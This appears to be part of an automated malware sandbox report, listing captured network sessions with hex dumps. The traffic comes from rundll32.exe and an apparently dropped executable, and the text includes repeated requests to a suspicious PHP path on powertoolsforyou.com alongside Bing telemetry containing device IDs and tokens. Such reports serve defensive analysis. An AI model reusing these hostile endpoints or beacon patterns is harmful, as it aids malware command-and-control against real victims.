                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://
                                                                                                                                                Sep 29, 2022 14:49:19.767323017 CEST4417INData Raw: 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon" href="https://www.bplaced.net/safari-pinned-tab.svg" color="#0b5fb4" /> <link rel="shortcut icon" type="image/x-icon" href="https://www.bplaced.net/favic
                                                                                                                                                Sep 29, 2022 14:49:19.767343998 CEST4418INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 69 73 69 62 6c 65 2d 78 73 20 76 69 73 69 62 6c 65 2d 73 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73
                                                                                                                                                Data Ascii: <div class="visible-xs visible-sm"> <div class="de init"> <div style="padding: 32% 1em 0 1%;"> Die gewnschte Seite ist nicht auffindbar.
                                                                                                                                                Sep 29, 2022 14:49:19.767363071 CEST4419INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 30 2e 39 65 6d 20 30 2e 35 65 6d 20 30 20 31 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61
                                                                                                                                                Data Ascii: <div style="padding: 0.9em 0.5em 0 1%;"> <div class="de init"> <a href="https://www.bplaced.net/datenschutz">Datenschutz</a> <a href="https://www.bplaced.net/impr
                                                                                                                                                Sep 29, 2022 14:49:19.767381907 CEST4421INData Raw: 69 74 65 72 68 65 6c 66 65 6e 21 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                Data Ascii: iterhelfen! </div> </div> <div class="en"> <div> Sorry, we can&lsquo;t find that page. </div>
                                                                                                                                                Sep 29, 2022 14:49:19.767405987 CEST4422INData Raw: 78 36 38 22 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 2c 6d 75 66 7a 3d 5f 30 78 64 63 36 30 5b 30 5d 2c 6c 61 6e 67 75 61 67 65 3b 76 61 72 20 70 72 6f 70 73 3d 5b 5f 30 78 64 63 36 30 5b 31 5d 2c 5f 30 78 64 63 36 30 5b 32 5d
                                                                                                                                                Data Ascii: x68"]; var i,mufz=_0xdc60[0],language;var props=[_0xdc60[1],_0xdc60[2],_0xdc60[3],_0xdc60[4]];if(Array[_0xdc60[7]](window[_0xdc60[6]][_0xdc60[5]])){for(i= 0;i< window[_0xdc60[6]][_0xdc60[5]][_0xdc60[8]];i++){language= window[_0xdc6


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                93192.168.2.34973438.238.72.10680C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:25.070528984 CEST4424OUTGET /themes/prestashop/cache/stats.php HTTP/1.1
                                                                                                                                                Host: powertoolsforyou.com
                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                94192.168.2.34973638.238.72.10680C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:25.581412077 CEST4566OUTGET /themes/prestashop/cache/stats.php HTTP/1.1
                                                                                                                                                Host: powertoolsforyou.com
                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                95192.168.2.349743172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:35.782980919 CEST8133OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                96172.217.168.1480192.168.2.349743C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:35.827776909 CEST8134INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:35 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:35 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                97192.168.2.349747172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:38.856554031 CEST9549OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                98172.217.168.1480192.168.2.349747C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:38.900609016 CEST9550INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:38 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:49:38 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                99192.168.2.349753172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:41.370513916 CEST10273OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.349677204.79.197.200443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:04 UTC0OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                Origin: https://www.bing.com
                                                                                                                                                Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                Content-type: text/xml
                                                                                                                                                X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                                                                                                                                X-PositionerType: Desktop
                                                                                                                                                X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                                                                                X-Search-SafeSearch: Moderate
                                                                                                                                                X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                                                                                X-UserAgeClass: Unknown
                                                                                                                                                X-BM-Market: US
                                                                                                                                                X-BM-DateFormat: M/d/yyyy
                                                                                                                                                X-CortanaAccessAboveLock: false
                                                                                                                                                X-Device-OSSKU: 48
                                                                                                                                                X-BM-DTZ: -420
                                                                                                                                                X-BM-FirstEnabledTime: 132061295966656129
                                                                                                                                                X-DeviceID: 0100748C09004E33
                                                                                                                                                X-BM-DeviceScale: 100
                                                                                                                                                X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                                                                                X-BM-Theme: 000000;0078d7
                                                                                                                                                X-BM-DeviceDimensionsLogical: 1232x1024
                                                                                                                                                X-BM-DeviceDimensions: 1232x1024
                                                                                                                                                X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                                                                                                                                X-Agent-DeviceId: 0100748C09004E33
                                                                                                                                                X-BM-CBT: 1660685844
                                                                                                                                                X-Device-isOptin: true
                                                                                                                                                X-Device-Touch: false
                                                                                                                                                X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                                                                                                                                X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Language: en-US
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                Host: www.bing.com
                                                                                                                                                Content-Length: 87284
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488077680&AC=1&CPH=4ef661f2
                                                                                                                                                2022-09-29 12:48:04 UTC2OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 62 38 39 65 62 65 32 38 63 66 65 39 34 31 35 66 38 61 64 65 33 38 62 63 66 66 64 35 32 65 38 61 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                                                                                                                                Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>b89ebe28cfe9415f8ade38bcffd52e8a</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                                                                                                                                2022-09-29 12:48:04 UTC18OUTData Raw: 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 49 51 75 65 75 65 45 72 72 6f 72 3c 2f 54 3e 3c 49 47 3e 37 33 38 35 64 65 38 36 32 35 66 62 34 33 31 30 62 37 30 35 39 37 30 62 32 38 64 35 35 38 62 33 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 65 72 72 6f 72 54 79 70 65 22 3a 22
                                                                                                                                                Data Ascii: TS></E><E><T>Event.CIQueueError</T><IG>7385de8625fb4310b705970b28d558b3</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","errorType":"
                                                                                                                                                2022-09-29 12:48:04 UTC34OUTData Raw: 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 63 73 2f 72 2f 2f 40 30 2f 6d 61 6e 69 66 65 73 74 25 32 46 74 68 72 65 73 68 6f 6c 64 2e 61 70 70 63 61 63 68 65 2f 6f 74 68 65 72 2f 30 2f 40 31 2f 63 73 2f 2d 31 2f 63 73 2f 2d 31 2f 2d 31 2f 2d 31 2b 63 7a 2f 73 2f 2f 40 30 2f 46 72 61 6d 65 77 6f 72 6b 2f 40 33 2f 30 2f 40 31 2f 63 7a 2f 2d 31 2f 63 7a 2f 64 30 2f 64 30 2f 64 30 2b 65 31 2f 74 2f 2f 40 30 2f 74 68 72 65 73 68 6f 6c 64 25 32 46 78 6c 73 2e 61 73 70 78 2f 78 6d 6c 68 74 74 70 72 65 71 75 65 73 74 2f 30 2f 40 31 2f 65 31 2f 2d 31 2f 65 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 65 74 2f 75 2f 2f 40 30 2f 56 32 25 32 46 32 2c 53 57 56 53 2f 2f 30 2f 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 65 74 2f 76 2f 2f 40 30
                                                                                                                                                Data Ascii: @1/-1/-1/-1/-1/-1/-1+cs/r//@0/manifest%2Fthreshold.appcache/other/0/@1/cs/-1/cs/-1/-1/-1+cz/s//@0/Framework/@3/0/@1/cz/-1/cz/d0/d0/d0+e1/t//@0/threshold%2Fxls.aspx/xmlhttprequest/0/@1/e1/-1/e1/-1/-1/-1+et/u//@0/V2%2F2,SWVS//0/@1/-1/-1/-1/-1/-1/-1+et/v//@0
                                                                                                                                                2022-09-29 12:48:04 UTC50OUTData Raw: 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 45 6e 72 69 63 68 65 64 43 6c 69 65 6e 74 49 6e 66 6f 22 3a 7b 22 4d 55 49 44 22 3a 22 31 45 31 37 42 39 42 37 30 45 39 42 34 43 36 45 39 35 37 44 31 35 39 45 44 33 36 34 36 46 46 46 22 2c 22 41 43 56 65 72 22 3a 22 34 65 66 36 36 31 66 32 22 2c 22 46 44 50 61 72 74 6e 65 72 45 6e 74 72 79 22 3a 22 61 75 74 6f 73 75 67 67 65 73 74 22 2c 22 69 73 4f 66 66 6c 69 6e 65 22 3a 30 2c 22 77 65 62 52 65 71 75 65 73 74 65 64 22 3a 31 2c 22 65 6e 74 72 79 50 6f 69 6e 74 22 3a 22 57 4e 53 53 54
                                                                                                                                                Data Ascii: it","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","EnrichedClientInfo":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","ACVer":"4ef661f2","FDPartnerEntry":"autosuggest","isOffline":0,"webRequested":1,"entryPoint":"WNSST
                                                                                                                                                2022-09-29 12:48:04 UTC66OUTData Raw: 76 72 3e 3c 2f 4d 3e 3c 2f 47 72 6f 75 70 3e 3c 47 72 6f 75 70 3e 3c 4d 3e 3c 49 47 3e 65 62 33 65 30 38 30 39 32 37 62 63 34 36 65 32 39 37 32 36 34 31 34 34 37 34 35 36 30 35 61 64 3c 2f 49 47 3e 3c 44 53 3e 3c 21 5b 43 44 41 54 41 5b 5b 7b 22 54 22 3a 22 44 2e 41 67 67 72 65 67 61 74 6f 72 22 2c 22 53 65 72 76 69 63 65 22 3a 22 41 75 74 6f 53 75 67 67 65 73 74 22 2c 22 53 63 65 6e 61 72 69 6f 22 3a 22 41 67 67 72 65 67 61 74 6f 72 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 44 53 22 3a 5b 5d 2c 22 72 61 6e 6b 65 72 4d 6f 64 65 6c 49 64 73 22 3a 7b 22 66 61 73 74 52 61 6e 6b 4d 6f 64 65 6c 49 64 22 3a 22 53 54 48 5f 38 64 30 36 66 38 33 63 2d 64 61 35 38 2d 34 63 30 32 2d 38 66 65 38 2d 62 61 32 63 30 34 39 64 39 38 30 39
                                                                                                                                                Data Ascii: vr></M></Group><Group><M><IG>eb3e080927bc46e297264144745605ad</IG><DS><![CDATA[[{"T":"D.Aggregator","Service":"AutoSuggest","Scenario":"Aggregator","AppNS":"SmartSearch","DS":[],"rankerModelIds":{"fastRankModelId":"STH_8d06f83c-da58-4c02-8fe8-ba2c049d9809
                                                                                                                                                2022-09-29 12:48:04 UTC82OUTData Raw: 63 70 3d 37 26 63 76 69 64 3d 33 31 32 33 65 66 35 63 30 38 35 65 34 65 37 33 39 31 30 63 36 38 33 32 36 30 31 32 38 31 38 32 26 69 67 3d 36 34 38 62 65 35 66 33 32 32 64 31 34 35 37 34 38 36 61 30 35 38 39 62 37 36 30 63 61 37 38 36 26 41 53 49 6e 69 74 49 47 3d 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 22 2c 22 52 65 73 6f 75 72 63 65 73 56 65 72 73 69 6f 6e 22 3a 22 38 5f 30 31 5f 30 5f 30 30 30 30 30 30 22 7d 2c 22 54 53 22 3a 31 35 39 35 35 32 34 36 38 33 33 38 35 2c 22 55 54 53 22 3a 31 36 36 34 34 38 38 30 38 32 37 34 31 2c 22 55 78 43 6c 61 73 73 69 66 69 63 61 74 69 6f 6e 22 3a 7b 22 63 6c 69 65 6e 74 22 3a 22 77 69 6e 64 6f 77 73 22 7d 2c 22 43 6f 6f 6b 69 65 73 22 3a 7b 22 4d 55 49 44 22 3a
                                                                                                                                                Data Ascii: cp=7&cvid=3123ef5c085e4e73910c683260128182&ig=648be5f322d1457486a0589b760ca786&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":1595524683385,"UTS":1664488082741,"UxClassification":{"client":"windows"},"Cookies":{"MUID":
                                                                                                                                                2022-09-29 12:48:04 UTC87INHTTP/1.1 204 No Content
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                X-MSEdge-Ref: Ref A: 2744AFF663B04FE4B4F4DDAC6F25CB19 Ref B: FRA31EDGE0519 Ref C: 2022-09-29T12:48:04Z
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:04 GMT
                                                                                                                                                Connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.349682204.79.197.200443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:08 UTC88OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                Origin: https://www.bing.com
                                                                                                                                                Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                Content-type: text/xml
                                                                                                                                                X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                                                                                                                                X-PositionerType: Desktop
                                                                                                                                                X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                                                                                X-Search-SafeSearch: Moderate
                                                                                                                                                X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                                                                                X-UserAgeClass: Unknown
                                                                                                                                                X-BM-Market: US
                                                                                                                                                X-BM-DateFormat: M/d/yyyy
                                                                                                                                                X-CortanaAccessAboveLock: false
                                                                                                                                                X-Device-OSSKU: 48
                                                                                                                                                X-BM-DTZ: -420
                                                                                                                                                X-BM-FirstEnabledTime: 132061295966656129
                                                                                                                                                X-DeviceID: 0100748C09004E33
                                                                                                                                                X-BM-DeviceScale: 100
                                                                                                                                                X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                                                                                X-BM-Theme: 000000;0078d7
                                                                                                                                                X-BM-DeviceDimensionsLogical: 1232x1024
                                                                                                                                                X-BM-DeviceDimensions: 1232x1024
                                                                                                                                                X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                                                                                                                                X-Agent-DeviceId: 0100748C09004E33
                                                                                                                                                X-BM-CBT: 1660685844
                                                                                                                                                X-Device-isOptin: true
                                                                                                                                                X-Device-Touch: false
                                                                                                                                                X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                                                                                                                                X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Language: en-US
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                Host: www.bing.com
